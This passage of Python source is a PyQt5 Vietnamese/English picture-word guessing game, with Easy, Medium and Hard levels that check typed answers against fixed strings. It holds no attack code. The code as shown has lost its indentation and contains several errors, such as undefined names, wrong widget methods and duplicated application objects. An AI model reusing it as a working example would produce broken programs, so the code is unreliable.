dialog.exec_()
def on_pushButton_2(self):
Level.hide()
import sys
app = QtWidgets.QApplication(sys.argv)
dialog_2 = QtWidgets.QDialog()
self.dialog_2.ui = TrungBinh()
self.dialog_2.setupUi(dialog_2)
dialog_2.show()
dialog_2.exec_()
def on_pushButton_3(self):
Level.hide()
import sys
app = QtWidgets.QApplication(sys.argv)
dialog_3 = QtWidgets.QDialog()
self.dialog_3.ui = Kho()
self.dialog_3.setupUi(dialog_3)
dialog_3.show()
dialog_3.exec_()
class De(object):
def setupUi(self, Frame):
Frame.setObjectName("De")
Frame.resize(452, 296)
self.textEdit = QtWidgets.QTextEdit(Frame)
self.textEdit.setGeometry(QtCore.QRect(50, 40, 256, 31))
self.textEdit.setObjectName("textEdit")
self.label = QtWidgets.QLabel(Frame)
self.label.setGeometry(QtCore.QRect(130, 10, 231, 31))
font = QtGui.QFont()
font.setPointSize(19)
self.label.setFont(font)
self.label.setObjectName("label")
self.pushButton = QtWidgets.QPushButton(Frame)
self.pushButton.setGeometry(QtCore.QRect(320, 40, 113, 32))
self.pushButton.setObjectName("pushButton")
self.label_2 = QtWidgets.QLabel(Frame)
self.label_2.setGeometry(QtCore.QRect(-430, 80, 931, 401))
self.label_2.setText("")
self.label_2.setPixmap(QtGui.QPixmap("../../Downloads/Easy 2/116585517_595969061089144_7152213483962716199_n.png"))
self.label_2.setObjectName("label_2")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Frame"))
self.label.setText(_translate("Frame", "Hãy nhập đáp án của bạn"))
self.pushButton.setText(_translate("Frame", "Kiểm tra"))
self.pushButton.clicked.connect(self.on_pushButton_clicked)
self.dialog = De1()
def on_pushButton_clicked(self):
if self.textEdit.text() == 'canbang':
De.hide()
import sys
dialog = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QDialog()
self.dialog.ui = De1()
self.dialog.ui.setupUi(dialog)
dialog.show()
dialog.exec_()
else:
ann = QtWidgets.QMessageBox(Dialog)
ann.setText('Xin hay nhap lai dap an cua ban khong dau va khong co khoang trong! ')
ann.exec_()
class De1(object):
def setupUi(self, Frame):
Frame.setObjectName("De1")
Frame.resize(452, 296)
self.textEdit = QtWidgets.QTextEdit(Frame)
self.textEdit.setGeometry(QtCore.QRect(50, 40, 256, 31))
self.textEdit.setObjectName("textEdit")
self.label = QtWidgets.QLabel(Frame)
self.label.setGeometry(QtCore.QRect(130, 10, 231, 31))
font = QtGui.QFont()
font.setPointSize(19)
self.label.setFont(font)
self.label.setObjectName("label")
self.pushButton = QtWidgets.QPushButton(Frame)
self.pushButton.setGeometry(QtCore.QRect(320, 40, 113, 32))
self.pushButton.setObjectName("pushButton")
self.label_2 = QtWidgets.QLabel(Frame)
self.label_2.setGeometry(QtCore.QRect(-240, 90, 711, 451))
self.label_2.setText("")
self.label_2.setPixmap(QtGui.QPixmap("../../Downloads/Easy 2/116876374_1802275236592370_1047754930775541732_n.png"))
self.label_2.setObjectName("label_2")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Frame"))
self.label.setText(_translate("Frame", "Hãy nhập đáp án của bạn"))
self.pushButton.setText(_translate("Frame", "Kiểm tra"))
self.pushButton.clicked.connect(self.on_pushButton)
self.dialog = Chucmung1()
def on_pushButton(self):
if self.textEdit.text() == 'alo':
De1.hide()
import sys
dialog = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QDialog()
self.dialog.ui = Chucmung1()
self.dialog.ui.setupUi(dialog)
dialog.show()
dialog.exec_()
else:
ann = QtWidgets.QMessageBox(Dialog)
ann.setText('Please enter your answer again. Please write without space')
ann.exec_()
class Chucmung1(object):
def setupUi(self, Frame):
Frame.setObjectName("Chucmung1")
Frame.resize(452, 296)
self.label = QtWidgets.QLabel(Frame)
self.label.setGeometry(QtCore.QRect(150, 90, 121, 81))
font = QtGui.QFont()
font.setPointSize(20)
self.label.setFont(font)
self.label.setObjectName("label")
self.pushButton = QtWidgets.QPushButton(Frame)
self.pushButton.setGeometry(QtCore.QRect(260, 210, 113, 32))
self.pushButton.setObjectName("pushButton")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Frame"))
self.label.setText(_translate("Frame", "Chúc mừng !"))
self.pushButton.setText(_translate("Frame", "Quay về"))
self.pushButton.clicked.connect(self.on_pushButton)
self.dialog = Version()
def on_pushButton(self):
Chucmung1.hide()
import sys
dialog = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QDialog()
self.dialog.ui = Version()
self.dialog.ui.setupUi(dialog)
dialog.show()
dialog.exec_()
class TrungBinh(object):
def setupUi(self, Frame):
Frame.setObjectName("TrungBinh")
Frame.resize(452, 296)
self.textEdit = QtWidgets.QTextEdit(Frame)
self.textEdit.setGeometry(QtCore.QRect(70, 40, 256, 31))
self.textEdit.setObjectName("textEdit")
self.label = QtWidgets.QLabel(Frame)
self.label.setGeometry(QtCore.QRect(120, 10, 231, 31))
font = QtGui.QFont()
font.setPointSize(19)
self.label.setFont(font)
self.label.setObjectName("label")
self.pushButton = QtWidgets.QPushButton(Frame)
self.pushButton.setGeometry(QtCore.QRect(340, 40, 113, 32))
self.pushButton.setObjectName("pushButton")
self.label_2 = QtWidgets.QLabel(Frame)
self.label_2.setGeometry(QtCore.QRect(-330, 80, 881, 391))
self.label_2.setText("")
self.label_2.setPixmap(
QtGui.QPixmap("../../Downloads/Medium 2/116879570_391505055159934_1546795416759554758_n.png"))
self.label_2.setObjectName("label_2")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Frame"))
self.el.setText(_translate("Frame", "Hãy nhập đáp án của bạn"))
self.pushButton.setText(_translate("Frame", "Kiểm tra"))
self.pushButton.clicked.connect(self.on_pushButton_clicked)
self.dialog = TrungBinh1()
def on_pushButton_clicked(self):
if self.textEdit.text() == 'canbang':
TrungBinh.hide()
import sys
dialog = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QDialog()
self.dialog.ui = TrungBinh1()
self.dialog.ui.setupUi(dialog)
dialog.show()
dialog.exec_()
else:
ann = QtWidgets.QMessageBox(Dialog)
ann.setText('Xin hay nhap lai dap an cua ban khong dau va khong co khoang trong! ')
ann.exec_()
class TrungBinh1(object):
def setupUi(self, Frame):
Frame.setObjectName("TrungBinh1")
self.textEdit = QtWidgets.QTextEdit(Frame)
self.textEdit.setGeometry(QtCore.QRect(70, 40, 256, 31))
self.textEdit.setObjectName("textEdit")
self.label = QtWidgets.QLabel(Frame)
self.label.setGeometry(QtCore.QRect(120, 10, 231, 31))
font = QtGui.QFont()
font.setPointSize(19)
self.label.setFont(font)
self.label.setObjectName("label")
self.pushButton = QtWidgets.QPushButton(Frame)
self.pushButton.setGeometry(QtCore.QRect(340, 40, 113, 32))
self.pushButton.setObjectName("pushButton")
self.label_2 = QtWidgets.QLabel(Frame)
self.label_2.setGeometry(QtCore.QRect(-230, 80, 731, 431))
self.label_2.setText("")
self.label_2.setPixmap(
QtGui.QPixmap("../../Downloads/Medium 2/116884721_737617947060831_5538558406999563532_n.png"))
self.label_2.setObjectName("label_2")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Frame"))
self.label.setText(_translate("Frame", "Hãy nhập đáp án của bạn"))
self.pushButton.setText(_translate("Frame", "Kiểm tra"))
self.pushButton.clicked.connect(self.on_pushButton)
self.dialog = Chucmung2()
def on_pushButton(self):
if self.textEdit.text() == 'alo':
TrungBinh1.hide()
import sys
dialog = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QDialog()
self.dialog.ui = Chucmung2()
self.dialog.ui.setupUi(dialog)
dialog.show()
dialog.exec_()
else:
ann = QtWidgets.QMessageBox(Dialog)
ann.setText('Please enter your answer again. Please write without space')
ann.exec_()
class Chucmung2(object):
def setupUi(self, Frame):
Frame.setObjectName("Chucmung1")
Frame.resize(452, 296)
self.label = QtWidgets.QLabel(Frame)
self.label.setGeometry(QtCore.QRect(150, 90, 121, 81))
font = QtGui.QFont()
font.setPointSize(20)
self.label.setFont(font)
self.label.setObjectName("label")
self.pushButton = QtWidgets.QPushButton(Frame)
self.pushButton.setGeometry(QtCore.QRect(260, 210, 113, 32))
self.pushButton.setObjectName("pushButton")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Frame"))
self.label.setText(_translate("Frame", "Chúc mừng !"))
self.pushButton.setText(_translate("Frame", "Quay về"))
self.pushButton.clicked.connect(self.on_pushButton)
self.dialog = Version()
def on_pushButton(self):
Chucmung2.hide()
import sys
dialog = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QDialog()
self.dialog.ui = Version()
self.dialog.ui.setupUi(dialog)
dialog.show()
dialog.exec_()
class Kho(object):
def setupUi(self, Frame):
Frame.setObjectName("Kho")
Frame.resize(452, 296)
self.textEdit = QtWidgets.QTextEdit(Frame)
self.textEdit.setGeometry(QtCore.QRect(70, 50, 256, 31))
self.textEdit.setObjectName("textEdit")
self.label = QtWidgets.QLabel(Frame)
self.label.setGeometry(QtCore.QRect(90, 10, 231, 31))
font = QtGui.QFont()
font.setPointSize(19)
self.label.setFont(font)
self.label.setObjectName("label")
self.pushButton = QtWidgets.QPushButton(Frame)
self.pushButton.setGeometry(QtCore.QRect(240, 100, 113, 32))
self.pushButton.setObjectName("pushButton")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Frame"))
self.label.setText(_translate("Frame", "Hãy nhập đáp án của bạn"))
self.pushButton.setText(_translate("Frame", "Kiểm tra"))
self.pushButton.clicked.connect(self.on_pushButton_clicked)
self.dialog = Kho1()
def on_pushButton_clicked(self):
if self.textEdit.text() == 'noname':
Kho.hide()
import sys
dialog = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QDialog()
self.dialog.ui = Kho1()
self.dialog.ui.setupUi(dialog)
dialog.show()
dialog.exec_()
else:
ann = QtWidgets.QMessageBox(Dialog)
ann.setText('Nhpa lai ket qua cua ban. Hay chac chan ban khong nhap co dau va co khoang trong')
ann.exec_()
class Kho1(object):
def setupUi(self, Frame):
Frame.setObjectName("Kho1")
self.textEdit = QtWidgets.QTextEdit(Frame)
self.textEdit.setGeometry(QtCore.QRect(50, 40, 256, 31))
self.textEdit.setObjectName("textEdit")
self.label = QtWidgets.QLabel(Frame)
self.label.setGeometry(QtCore.QRect(150, 10, 231, 31))
font = QtGui.QFont()
font.setPointSize(19)
self.label.setFont(font)
self.label.setObjectName("label")
self.pushButton = QtWidgets.QPushButton(Frame)
self.pushButton.setGeometry(QtCore.QRect(320, 40, 113, 32))
self.pushButton.setObjectName("pushButton")
self.label_2 = QtWidgets.QLabel(Frame)
self.label_2.setGeometry(QtCore.QRect(-240, 80, 751, 371))
self.label_2.setText("")
self.label_2.setPixmap(
QtGui.QPixmap("../../Downloads/Hard 2/116909831_282005523063792_1699439797191800089_n.png"))
self.label_2.setObjectName("label_2")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Frame"))
self.label.setText(_translate("Frame", "Hãy nhập đáp án của bạn"))
self.pushButton.setText(_translate("Frame", "Kiểm tra"))
self.pushButton.clicked.connect(self.on_pushButton)
self.dialog = Chucmung2()
def on_pushButton(self):
if self.textEdit.text() == 'alo':
Kho1.hide()
import sys
dialog = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QDialog()
self.dialog.ui = Chucmung2()
self.dialog.ui.setupUi(dialog)
dialog.show()
dialog.exec_()
else:
ann = QtWidgets.QMessageBox(Dialog)
ann.setText('Please enter your answer again. Please write without space')
ann.exec_()
class Chucmung3(object):
def setupUi(self, Frame):
Frame.setObjectName("Chucmung3")
Frame.resize(452, 296)
self.label = QtWidgets.QLabel(Frame)
self.label.setGeometry(QtCore.QRect(150, 90, 121, 81))
font = QtGui.QFont()
font.setPointSize(20)
self.label.setFont(font)
self.label.setObjectName("label")
self.pushButton = QtWidgets.QPushButton(Frame)
self.pushButton.setGeometry(QtCore.QRect(260, 210, 113, 32))
self.pushButton.setObjectName("pushButton")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Frame"))
self.label.setText(_translate("Frame", "Chúc mừng !"))
self.pushButton.setText(_translate("Frame", "Quay về"))
self.pushButton.clicked.connect(self.on_pushButton)
self.dialog = Version()
def on_pushButton(self):
Chucmung3.hide()
import sys
dialog = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QDialog()
self.dialog.ui = Version()
self.dialog.ui.setupUi(dialog)
dialog.show()
dialog.exec_()
class LevelEng(object):
def setupUi(self, Frame):
Frame.setObjectName("levelEng")
Frame.resize(452, 296)
self.label_4 = QtWidgets.QLabel(Frame)
self.label_4.setGeometry(QtCore.QRect(90, 100, 51, 81))
font = QtGui.QFont()
font.setPointSize(18)
self.label_4.setFont(font)
self.label_4.setObjectName("label_4")
self.label = QtWidgets.QLabel(Frame)
self.label.setGeometry(QtCore.QRect(40, 20, 271, 51))
font = QtGui.QFont()
font.setPointSize(31)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(Frame)
self.label_2.setGeometry(QtCore.QRect(280, 60, 81, 31))
self.label_2.setObjectName("label_2")
self.pushButton = QtWidgets.QPushButton(Frame)
self.pushButton.setGeometry(QtCore.QRect(210, 90, 131, 41))
self.pushButton.setObjectName("pushButton")
self.pushButton_2 = QtWidgets.QPushButton(Frame)
self.pushButton_2.setGeometry(QtCore.QRect(210, 130, 131, 41))
self.pushButton_2.setObjectName("pushButton_2")
self.pushButton_3 = QtWidgets.QPushButton(Frame)
self.pushButton_3.setGeometry(QtCore.QRect(210, 170, 131, 41))
self.pushButton_3.setObjectName("pushButton_3")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Frame"))
self.label_4.setText(_translate("Frame", "Level"))
self.label.setText(_translate("Frame", "Đuổi hình bắt chữ"))
self.label_2.setText(_translate("Frame", "by NoName"))
self.pushButton.setText(_translate("Frame", "Easy"))
self.pushButton.clicked.connect(self.on_pushButton_1)
self.dialog = Easy()
self.pushButton_2.setText(_translate("Frame", "Medium"))
self.pushButton_2.clicked.connect(self.on_pushButton_2)
self.dialog_2 = Medium()
self.pushButton_3.setText(_translate("Frame", "Hard"))
self.pushButton_3.clicked.connect(self.on_pushButton_3)
self.dialog_3 = Hard()
def on_pushButton_1(self):
LevelEng.hide()
import sys
dialog = QtWidgets.QDialog()
self.dialog.ui = Easy()
self.dialog.ui.setupUi(dialog)
dialog.show()
dialog.exec_()
def on_pushButton_2(self):
LevelEng.hide()
import sys
dialog_2 = QtWidgets.QDialog()
self.dialog_2.ui = Medium()
self.dialog_2.ui.setupUi(dialog_2)
dialog_2.show()
dialog_2.exec_()
def on_pushButton_3(self):
LevelEng.hide()
import sys
dialog_3 = QtWidgets.QDialog()
self.dialog_3.ui = Hard()
self.dialog_3.ui.setupUi(dialog_3)
dialog_3.show()
dialog_3.exec_()
class Easy(object):
def setupUi(self, Frame):
Frame.setObjectName("Easy")
Frame.resize(510, 309)
self.textEdit = QtWidgets.QTextEdit(Frame)
self.textEdit.setGeometry(QtCore.QRect(70, 50, 411, 31))
self.textEdit.setObjectName("textEdit")
self.label = QtWidgets.QLabel(Frame)
self.label.setGeometry(QtCore.QRect(150, 10, 231, 31))
font = QtGui.QFont()
font.setPointSize(19)
self.label.setFont(font)
self.label.setObjectName("label")
self.pushButton = QtWidgets.QPushButton(Frame)
self.pushButton.setGeometry(QtCore.QRect(370, 90, 113, 32))
self.pushButton.setObjectName("pushButton")
self.label_2 = QtWidgets.QLabel(Frame)
self.label_2.setGeometry(QtCore.QRect(100, 130, 321, 151))
self.label_2.setText("")
self.label_2.setPixmap(QtGui.QPixmap("../../Downloads/Easy/116341300_897281977430895_4028080577005173643_n.png"))
self.label_2.setObjectName("label_2")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Frame"))
self.label.setText(_translate("Frame", "Please enter your answer "))
self.pushButton.setText(_translate("Frame", "Check"))
self.pushButton.clicked.connect(self.on_pushButton_clicked)
self.dialog = Easy1()
def on_pushButton_clicked(self):
if self.textEdit.text() == 'alo' :
Easy.hide()
import sys
dialog = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QDialog()
self.dialog.ui = Easy1()
self.dialog.ui.setupUi(dialog)
dialog.show()
dialog.exec_()
else :
ann = QtWidgets.QMessageBox(Dialog)
ann.setText('Please enter your answer again. Please write without space')
ann.exec_()
class Easy1(object):
def setupUi(self, Frame):
Dialog.setObjectName("Easy1")
Dialog.resize(450, 520)
self.textEdit = QtWidgets.QTextEdit(Frame)
self.textEdit.setGeometry(QtCore.QRect(70, 50, 411, 31))
self.textEdit.setObjectName("textEdit")
self.label = QtWidgets.QLabel(Frame)
self.label.setGeometry(QtCore.QRect(150, 10, 231, 31))
font = QtGui.QFont()
font.setPointSize(19)
self.label.setFont(font)
self.label.setObjectName("label")
self.pushButton = QtWidgets.QPushButton(Frame)
self.pushButton.setGeometry(QtCore.QRect(370, 90, 113, 32))
self.pushButton.setObjectName("pushButton")
self.label_2 = QtWidgets.QLabel(Frame)
self.label_2.setGeometry(QtCore.QRect(110, 110, 261, 121))
self.label_2.setText("")
self.label_2.setPixmap(QtGui.QPixmap("../../Downloads/Easy/116807883_320320929166395_2378826134638404244_n.png"))
self.label_2.setObjectName("label_2")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Frame"))
self.label.setText(_translate("Frame", "Please enter your answer "))
self.pushButton.setText(_translate("Frame", "Check"))
self.pushButton.clicked.connect(self.on_pushButton)
self.dialog = Congratulation1()
def on_pushButton(self):
if self.textEdit.text() == 'alo' :
Easy1.hide()
import sys
dialog = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QDialog()
self.dialog.ui = Congratulation1()
self.dialog.ui.setupUi(dialog)
dialog.show()
dialog.exec_()
else :
ann = QtWidgets.QMessageBox(Dialog)
ann.setText('Please enter your answer again. Please write without space')
ann.exec_()
class Congratulation1(object):
def setupUi(self, Frame):
Frame.setObjectName("Congratulation1")
Frame.resize(400,300)
self.label = QtWidgets.QLabel(Frame)
self.label.setGeometry(QtCore.QRect(130, 90, 161, 81))
font = QtGui.QFont()
font.setPointSize(20)
self.label.setFont(font)
self.label.setObjectName("label")
self.pushButton = QtWidgets.QPushButton(Frame)
self.pushButton.setGeometry(QtCore.QRect(270, 230, 113, 32))
self.pushButton.setObjectName("pushButton")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Frame"))
self.label.setText(_translate("Frame", "Congratulations !"))
self.pushButton.setText(_translate("Frame", "Back"))
self.pushButton.clicked.connect(self.on_pushButton)
self.dialog = Version()
def on_pushButton(self):
Congratulation1.hide()
import sys
dialog = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QDialog()
self.dialog.ui = Version()
self.dialog.ui.setupUi(dialog)
dialog.show()
dialog.exec_()
class Medium(object):
def setupUi(self, Frame):
Frame.setObjectName("Medium")
Frame.resize(452, 296)
self.textEdit = QtWidgets.QTextEdit(Frame)
self.textEdit.setGeometry(QtCore.QRect(70, 50, 256, 31))
self.textEdit.setObjectName("textEdit")
self.label = QtWidgets.QLabel(Frame)
self.label.setGeometry(QtCore.QRect(90, 10, 231, 31))
font = QtGui.QFont()
font.setPointSize(19)
self.label.setFont(font)
self.label.setObjectName("label")
self.pushButton = QtWidgets.QPushButton(Frame)
self.pushButton.setGeometry(QtCore.QRect(240, 100, 113, 32))
self.pushButton.setObjectName("pushButton")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Frame"))
self.label.setText(_translate("Frame", "Please enter your answer "))
self.pushButton.setText(_translate("Frame", "Check"))
self.pushButton.clicked.connect(self.on_pushButton_clicked)
self.dialog = Medium1()
def on_pushButton_clicked(self):
if self.textEdit.text() == 'alo':
Medium.hide()
import sys
dialog = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QDialog()
self.dialog.ui = Medium1()
self.dialog.ui.setupUi(dialog)
dialog.show()
dialog.exec_()
else:
ann = QtWidgets.QMessageBox(Dialog)
ann.setText('Please enter your answer again. Please write without space ')
ann.exec_()
class Medium1(object):
def setupUi(self, Frame):
Frame.setObjectName("Medium1")
Frame.resize(400, 281)
self.textEdit = QtWidgets.QTextEdit(Frame)
self.textEdit.setGeometry(QtCore.QRect(70, 50, 256, 31))
self.textEdit.setObjectName("textEdit")
self.label = QtWidgets.QLabel(Frame)
self.label.setGeometry(QtCore.QRect(90, 10, 231, 31))
font = QtGui.QFont()
font.setPointSize(19)
self.label.setFont(font)
self.label.setObjectName("label")
self.pushButton = QtWidgets.QPushButton(Frame)
self.pushButton.setGeometry(QtCore.QRect(240, 90, 113, 32))
self.pushButton.setObjectName("pushButton")
self.label_2 = QtWidgets.QLabel(Frame)
self.label_2.setGeometry(QtCore.QRect(70, 120, 271, 151))
self.label_2.setText("")
self.label_2.setPixmap(QtGui.QPixmap("../../Downloads/Medium/116306184_621174795191987_5304430294561687164_n.png"))
self.label_2.setObjectName("label_2")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Frame"))
self.label.setText(_translate("Frame", "Please enter your answer "))
self.pushButton.setText(_translate("Frame", "Check"))
self.pushButton.clicked.connect(self.on_pushButton)
self.dialog = Congratulation2()
def on_pushButton(self):
Medium1.hide()
import sys
dialog = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QDialog()
dialog = QtWidgets.QDialog()
self.dialog.ui = Congratulation2()
self.dialog.ui.setupUi(dialog)
dialog.show()
dialog.exec_()
class Congratulation2(object):
def setupUi(self, Frame):
Frame.setObjectName("Congratulation2")
Frame.resize(452, 296)
self.label = QtWidgets.QLabel(Frame)
self.label.setGeometry(QtCore.QRect(130, 90, 161, 81))
font = QtGui.QFont()
font.setPointSize(20)
self.label.setFont(font)
self.label.setObjectName("label")
self.pushButton = QtWidgets.QPushButton(Frame)
self.pushButton.setGeometry(QtCore.QRect(270, 230, 113, 32))
self.pushButton.setObjectName("pushButton")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Frame"))
self.label.setText(_translate("Frame", "Congratulations !"))
self.pushButton.setText(_translate("Frame", "Back"))
self.pushButton.clicked.connect(self.on_pushButton)
self.dialog = Version()
def on_pushButton(self):
Congratulation2.hide()
import sys
dialog = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QDialog()
self.dialog.ui = Version()
self.dialog.ui.setupUi(dialog)
dialog.show()
dialog.exec_()
class Hard(object):
def setupUi(self, Frame):
Frame.setObjectName("Hard")
Frame.resize(452, 296)
self.textEdit = QtWidgets.QTextEdit(Frame)
self.textEdit.setGeometry(QtCore.QRect(70, 50, 256, 31))
self.textEdit.setObjectName("textEdit")
self.label = QtWidgets.QLabel(Frame)
self.label.setGeometry(QtCore.QRect(90, 10, 231, 31))
font = QtGui.QFont()
font.setPointSize(19)
self.label.setFont(font)
self.label.setObjectName("label")
self.pushButton = QtWidgets.QPushButton(Frame)
self.pushButton.setGeometry(QtCore.QRect(240, 100, 113, 32))
self.pushButton.setObjectName("pushButton")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Frame"))
self.label.setText(_translate("Frame", "Please enter your answer "))
self.pushButton.setText(_translate("Frame", "Check"))
self.pushButton.clicked.connect(self.on_pushButton_clicked)
self.dialog = Hard1()
def on_pushButton_clicked(self):
if self.textEdit.text() == 'alo':
Hard.hide()
import sys
dialog = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QDialog()
self.dialog.ui = Hard1()
self.dialog.ui.setupUi(dialog)
dialog.show()
dialog.exec_()
else:
ann = QtWidgets.QMessageBox(Dialog)
ann.setText('Please enter your answer again. Please write without space ')
ann.exec_()
class Hard1(object):
def setupUi(self, Frame):
Frame.setObjectName("Hard1")
Frame.resize(452, 296)
self.textEdit = QtWidgets.QTextEdit(Frame)
self.textEdit.setGeometry(QtCore.QRect(20, 230, 256, 31))
self.textEdit.setObjectName("textEdit")
self.label = QtWidgets.QLabel(Frame)
self.label.setGeometry(QtCore.QRect(90, 10, 231, 31))
font = QtGui.QFont()
font.setPointSize(19)
self.label.setFont(font)
self.label.setObjectName("label")
self.pushButton = QtWidgets.QPushButton(Frame)
self.pushButton.setGeometry(QtCore.QRect(280, 230, 113, 32))
self.pushButton.setObjectName("pushButton")
self.label_2 = QtWidgets.QLabel(Frame)
self.label_2.setGeometry(QtCore.QRect(50, 60, 291, 141))
self.label_2.setText("")
self.label_2.setPixmap(QtGui.QPixmap("../../Downloads/116429996_603729057000960_50141712269189660_n.png"))
self.label_2.setObjectName("label_2")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Frame"))
self.label.setText(_translate("Frame", "Please enter your answer "))
self.pushButton.setText(_translate("Frame", "Check"))
self.pushButton.clicked.connect(self.on_pushButton)
self.dialog = Congratulation3()
def on_pushButton(self):
Hard1.hide()
import sys
dialog = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QDialog()
self.dialog.ui = Congratulation3()
self.dialog.ui.setupUi(dialog)
dialog.show()
dialog.exec_()
class Congratulation3(object):
def setupUi(self, Frame):
Frame.setObjectName("Congratulation3")
Frame.resize(400, 300)
self.label = QtWidgets.QLabel(Frame)
self.label.setGeometry(QtCore.QRect(130, 90, 161, 81))
font = QtGui.QFont()
font.setPointSize(20)
self.label.setFont(font)
self.label.setObjectName("label")
self.pushButton = QtWidgets.QPushButton(Frame)
self.pushButton.setGeometry(QtCore.QRect(270, 230, 113, 32))
self.pushButton.setObjectName("pushButton")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Frame"))
self.label.setText(_translate("Frame", "Congratulations !"))
self.pushButton.setText(_translate("Frame", "Back"))
self.pushButton.clicked.connect(self.on_pushButton)
self.dialog = Version()
def on_pushButton(self):
Congratulation3.hide()
import sys
dialog = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QDialog()
self.dialog.ui = Version()
self.dialog.ui.setupUi(dialog)
dialog.show()
dialog.exec_()
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(450, 520)
self.label = QtWidgets.QLabel(Dialog)
self.label.setGeometry(QtCore.QRect(20, 110, 91, 31))
font = QtGui.QFont()
font.setPointSize(17)
self.label.setFont(font)
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(Dialog)
self.label_2.setGeometry(QtCore.QRect(20, 150, 91, 31))
font = QtGui.QFont()
font.setPointSize(17)
self.label_2.setFont(font)
self.label_2.setObjectName("label_2")
self.textEdit = QtWidgets.QLineEdit(Dialog)
self.textEdit.setGeometry(QtCore.QRect(120, 110, 256, 31))
self.textEdit.setObjectName("textEdit")
self.textEdit_2 = QtWidgets.QLineEdit(Dialog)
self.textEdit_2.setGeometry(QtCore.QRect(120, 150, 256, 31))
self.textEdit_2.setObjectName("textEdit_2")
self.label_3 = QtWidgets.QLabel(Dialog)
self.label_3.setGeometry(QtCore.QRect(120, 30, 191, 51))
font = QtGui.QFont()
font.setPointSize(22)
self.label_3.setFont(font)
self.label_3.setObjectName("label_3")
self.pushButton = QtWidgets.QPushButton(Dialog)
self.pushButton.setGeometry(QtCore.QRect(250, 200, 121, 41))
font = QtGui.QFont()
font.setPointSize(15)
self.pushButton.setFont(font)
self.pushButton.setObjectName("pushButton")
self.commandLinkButton_2 = QtWidgets.QCommandLinkButton(Dialog)
